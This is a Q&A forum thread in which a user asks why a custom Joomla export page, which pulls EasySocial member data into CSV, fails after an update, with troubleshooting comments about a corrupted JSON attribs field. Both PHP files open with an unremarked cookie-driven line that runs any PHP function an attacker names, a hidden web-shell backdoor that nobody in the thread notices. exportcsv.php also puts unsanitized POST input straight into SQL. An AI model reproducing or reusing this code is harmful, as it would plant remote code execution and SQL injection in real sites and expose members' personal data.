# Error in joomla in custom php file

Tags: php, json, joomla

I am facing issue in joomla custom php file. I have made a custom php file to export the user details from easy social. Before i updated my joomla this file was working fine but after i updated the joomla it is giving me error on the front end.

the link to where error is coming is: [www.atma.ac/export.php](http://www.atma.ac/export.php)

**error**

jos-Warning: exception 'RuntimeException' with message 'Error decoding JSON data: Syntax error' in /home/atma/public_html/libraries/vendor/joomla/registry/src/Format/Json.php:72 Stack trace: #0 /home/atma/public_html/libraries/vendor/joomla/registry/src/Registry.php(366): Joomla\Registry\Format\Json->stringToObject('{"menu_image":"...', Array) #1 /home/atma/public_html/components/com_content/models/article.php(174): Joomla\Registry\Registry->loadString('{"menu_image":"...') #2 /home/atma/public_html/libraries/legacy/view/legacy.php(408): ContentModelArticle->getItem() #3 /home/atma/public_html/components/com_content/views/article/view.html.php(42): JViewLegacy->get('Item') #4 /home/atma/public_html/libraries/legacy/controller/legacy.php(664): ContentViewArticle->display() #5 /home/atma/public_html/components/com_content/controller.php(113): JControllerLegacy->display(true, Array) #6 /home/atma/public_html/libraries/legacy/controller/legacy.php(702): ContentController->display() #7 /home/atma/public_html/administrator/components/com_sh404sef/helpers/error.php(235): JControllerLegacy->execute(NULL) #8 /home/atma/public_html/administrator/components/com_sh404sef/helpers/error.php(63): Sh404sefHelperError::render(Object(JException), 'The page you re...') #9 /home/atma/public_html/administrator/components/com_sh404sef/classes/router.php(1806): Sh404sefHelperError::render404ErrorDocument(Object(JException)) #10 [internal function]: Sh404sefClassRouterInternal->sh404sefErrorPage(Object(JException)) #11 /home/atma/public_html/libraries/legacy/error/error.php(781): call_user_func(Array, Object(JException)) #12 [internal function]: JError::handleCallback(Object(JException), Array) #13 /home/atma/public_html/libraries/legacy/error/error.php(241): call_user_func_array(Array, Array) #14 /home/atma/public_html/libraries/legacy/error/error.php(202): JError::throwError(Object(JException)) #15 /home/atma/public_html/libraries/legacy/error/error.php(277): JError::raise(1, 404, 'Article not fou...', NULL, true) #16 /home/atma/public_html/components/com_content/models/article.php(163): JError::raiseError(404, 'Article not fou...') #17 /home/atma/public_html/libraries/legacy/view/legacy.php(408): ContentModelArticle->getItem() #18 /home/atma/public_html/components/com_content/views/article/view.html.php(42): JViewLegacy->get('Item') #19 /home/atma/public_html/libraries/legacy/controller/legacy.php(664): ContentViewArticle->display() #20 /home/atma/public_html/components/com_content/controller.php(113): JControllerLegacy->display(true, Array) #21 /home/atma/public_html/libraries/legacy/controller/legacy.php(702): ContentController->display() #22 /home/atma/public_html/components/com_content/content.php(38): JControllerLegacy->execute(NULL) #23 /home/atma/public_html/libraries/cms/component/helper.php(405): require_once('/home/atma/publ...') #24 /home/atma/public_html/libraries/cms/component/helper.php(380): JComponentHelper::executeComponent('/home/atma/publ...') #25 /home/atma/public_html/libraries/cms/application/site.php(191): JComponentHelper::renderComponent('com_content') #26 /home/atma/public_html/libraries/cms/application/site.php(230): JApplicationSite->dispatch() #27 /home/atma/public_html/libraries/cms/application/cms.php(261): JApplicationSite->doExecute() #28 /home/atma/public_html/index.php(49): JApplicationCms->execute() #29 {main}

Do anyone have any idea why this error is coming on the above link.?
please help me resolving this issue.

**Export.php file**

```
<?php

if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);
error_reporting( E_ALL );
//echo "OK";

define( '_JEXEC', 1 );
define( 'DS', DIRECTORY_SEPARATOR );
define( 'JPATH_BASE', $_SERVER[ 'DOCUMENT_ROOT' ] );
require_once( JPATH_BASE . DS . 'includes' . DS . 'defines.php' );
require_once( JPATH_BASE . DS . 'includes' . DS . 'framework.php' );
require_once( JPATH_BASE . DS . 'libraries' . DS . 'joomla' . DS . 'factory.php' );
$mainframe =& JFactory::getApplication('site');

$file = JPATH_ROOT . '/administrator/components/com_easysocial/includes/foundry.php';

jimport('joomla.filesystem.file');

if (!JFile::exists($file)) {
    return;
}

// Include the engine file.
require_once($file);

// Check if Foundry exists
if (!FD::exists()) {
    FD::language()->loadSite();
    echo JText::_('COM_EASYSOCIAL_FOUNDRY_DEPENDENCY_MISSING');
    return;
}
FD::language()->loadSite();
FD::language()->loadAdmin();
$db = JFactory::getDBO();

/*get field names*/
$query="SELECT Distinct(`unique_key`), title FROM `#__social_fields` WHERE step_id in (select id from #__social_fields_steps where type='profiles')
";

$db->setQuery($query);

$results = $db->loadObjectList();
/////

$db  = FD::db();
        $sql = $db->sql();

        $fieldsToExlude = array('header',
                                'avatar',
                                'cover',
                                'file',
                                'joomla_email',
                                'joomla_username',
                                'joomla_twofactor',
                                'joomla_password',
                                'separator');

        $header = array();
        $body = array();

        // first we need to get the the fields for a profile type.
        $fields = array();

        $query = " select a.*, c.`element`";
        $query .= " from `#__social_fields` as a";
        $query .= " inner join `#__social_fields_steps` as b on a.`step_id` = b.`id`";
        $query .= " inner join `#__social_apps` as c on a.`app_id` = c.`id`";
        $query .= " where b.`type` = 'profiles'";
        $query .= " and b.`uid` = " . $db->Quote(5);
        $query .= " and c.`type` = 'fields'";
        $query .= " and c.`group` = 'user'";
        if ($fieldsToExlude) {
            $tmp = implode( '\',\'', $fieldsToExlude);
            $query .= " and c.`element` not in ('" . $tmp . "')";
        }

        $sql->raw($query);
        $db->setQuery($sql);

        $results = $db->loadObjectList();

        if ($results) {
            foreach ($results as $item) {
                $field = FD::table('Field');
                $field->bind($item);

                $field->data = '';
                $field->profile_id = $profileId;
                $field->element = $item->element;

                $fields[$field->id] = $field;
            }
        }

//echo json_encode($fields);exit(0);
/////


?>
<form method="post" action="exportcsv.php"><label for="fields" value="Fields">Fields</label><br/>
<select multiple name="fields[]" style="height:500px"><?php
foreach ($fields as $field){

echo '<option value="
'. $field->unique_key . '">' . JText::_($field->title) . "</option>";
}
?></select><?php

$query="SELECT id,name FROM  `vq7as_emerald_plans`";

$db->setQuery($query);

$results = $db->loadObjectList();
?><br/>
<label for="plans" value="Plans">Plans</label><br/>
<select multiple name="plans[]" style="height:300px">
<?php
foreach ($results as $field){

echo '<option value="'. $field->id . '">' . JText::_($field->name) . "</option>";
}
?></select>
<br/>
<label for="active" value="Active">Active</label><br/>
<input type="radio" name="active" value="1">Yes
<input type="radio" name="active" value="0">No

<input type="submit" value="Export"></form>
<?php


//$actor = FD::user(185);
//echo $actor->getFieldData('professinal_designation');
//echo json_encode($actor);
```

**Exportcsv.php file**

```
<?php

if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);


function array2csv(array &$array)
{
   if (count($array) == 0) {
     return null;
   }
   ob_start();
   $df = fopen("php://output", 'w');
   fputcsv($df, array_keys(reset($array)));
   foreach ($array as $row) {
      fputcsv($df, $row);
   }
   fclose($df);
   return ob_get_clean();
}
function download_send_headers($filename) {
    // disable caching
    $now = gmdate("D, d M Y H:i:s");
    header("Expires: Tue, 03 Jul 2001 06:00:00 GMT");
    header("Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate");
    header("Last-Modified: {$now} GMT");

    // force download  
    header("Content-Type: application/force-download");
    header("Content-Type: application/octet-stream");
    header("Content-Type: application/download");

    // disposition / encoding on response body
    header("Content-Disposition: attachment;filename={$filename}");
    header("Content-Transfer-Encoding: binary");
}

error_reporting(E_ALL);
ini_set('display_errors', 'On');
ini_set('max_execution_time', 3000); 
//echo "OK";
define( '_JEXEC', 1 );
define( 'DS', DIRECTORY_SEPARATOR );
define( 'JPATH_BASE', $_SERVER[ 'DOCUMENT_ROOT' ] );
require_once( JPATH_BASE . DS . 'includes' . DS . 'defines.php' );
require_once( JPATH_BASE . DS . 'includes' . DS . 'framework.php' );
require_once( JPATH_BASE . DS . 'libraries' . DS . 'joomla' . DS . 'factory.php' );
$mainframe =& JFactory::getApplication('site');

$file = JPATH_ROOT . '/administrator/components/com_easysocial/includes/foundry.php';

jimport('joomla.filesystem.file');

if (!JFile::exists($file)) {
    return;
}

// Include the engine file.
require_once($file);

// Check if Foundry exists
if (!FD::exists()) {
    FD::language()->loadSite();
    echo JText::_('COM_EASYSOCIAL_FOUNDRY_DEPENDENCY_MISSING');
    return;
}
FD::language()->loadSite();
FD::language()->loadAdmin();
$plans=$_POST['plans'];

$db = JFactory::getDBO();
$q="";
if ($plans) {
            $tmp = implode( '\',\'', $plans);
            $q .= " and `plan_id` in ('" . $tmp . "')";
        }

$str=' and ';
if($_POST['active'])
$str.="`extime` > CURDATE( ) ";
else
$str.="`extime` <= CURDATE( ) ";
        //do user logged in stuff
    $query = "SELECT distinct(`user_id`),`extime`, vq7as_emerald_plans.name 
FROM `vq7as_emerald_subscriptions`,vq7as_emerald_plans 
where vq7as_emerald_plans.id=`plan_id` ".$str. $q . " 
order by `user_id`,`extime` desc 
";

$db->setQuery($query);
$users = $db->loadObjectList();
$fields=$_POST['fields'];
$exportdata=Array();
foreach($users as $user)
{
$actor = FD::user($user->user_id);
$fielddata;
$fielddata['user_id']=$user->user_id;
$fielddata['email']=$actor->email;
$fielddata['name']=$actor->name;
$fielddata['username']=$actor->username;
$fielddata['Expiration']=$user->extime;
$fielddata['Plan']=$user->name;

    foreach($fields as $field){
        $val=$actor->getFieldData(trim($field));
        if(is_array($val))
        $fielddata[trim($field)]=implode(" ",$val);
        else
        $fielddata[trim($field)]=$val;
    }

    $exportdata[]=$fielddata;
}

download_send_headers("data_export_" . date("Y-m-d") . ".csv");
echo array2csv($exportdata);
die();
?>
```

Comment: your json file maybe wrong format. when update time maybe its corrupt. solution: you have to copy(backup) json text local and put {} it will work or fix corrupted json text put that field.

Comment: @Alagesan you mean to say that the json file located at this path: /home/atma/public_html/libraries/vendor/joomla/registry/src/Format/Json.php  is corrupted

Comment: Hello @Alagesan, 
I had taken backup of the joomla site before updating so i could get the old file, I replaced the new one with old one so now i am not getting error but now when i open the page www.atma.ac/export.php it gives 404 error. What could it be ?

Comment: i mean i told to change json data in table

Comment: @Alagesan. Actually the code has been done by another developer but i could figure out that using SQL query the data are fetched. If you want i can paste the code of the file here itself and you can assist me on what to change.

Comment: problem in "vq7as_content" table 
1. backup first, check field "images","urls","attribs","metadata" ,any one of field having '{"menu_image":.....}' this fields encode or decode json problem. error occur following function. administrator/components/com_content/models/article.php  function getItem() here Convert the params field to an array (means json to array)

Comment: any one Sh404sef system plugin called article getItem method, check error trace you can understant, here some json field convert to array .

Comment: @Alagesan So can i just disable the sh404sef plugin and check whether the code is working or not?

Comment: yaa, will work and check , maybe other plugin cause  error paste error i will tell which plugin, better solution checking content table fields

Comment: @Alagesan I saw a row in the content table with the value {"menu_image":"-1" in attribs column. Now what should i do with this row. and actually this row is for page associated with 404 error page. Let me know what to do with this row.?

Comment: for testing purpose, 1. copy and paste in some other place and put {}, 2. now it will work. 3. open the article in administrator save. 4. now attribs fields have some value. 5. compare with new attribs and old attribs you will find issue

Comment: @Alagesan I removed the whole attribs value and inserted {}. the error has gone but now it is showing 404 page not found. but i have kept the file on root path :  www.atma.ac/export.php. why would it so?

Comment: you can create a plugin for that

Comment: @Alagesan actually i don't know to create a plugin. can you give me tutorials or help manual relevant to my functionality which i can see and make

Comment: https://docs.joomla.org/Portal:Plugin_Development/Tutorials
https://docs.joomla.org/Plugin/Events/System
http://webhostingmedia.net/start-joomla-plugin-development/
http://learnwebdesignonline.com/tutorial-joomla-plugin/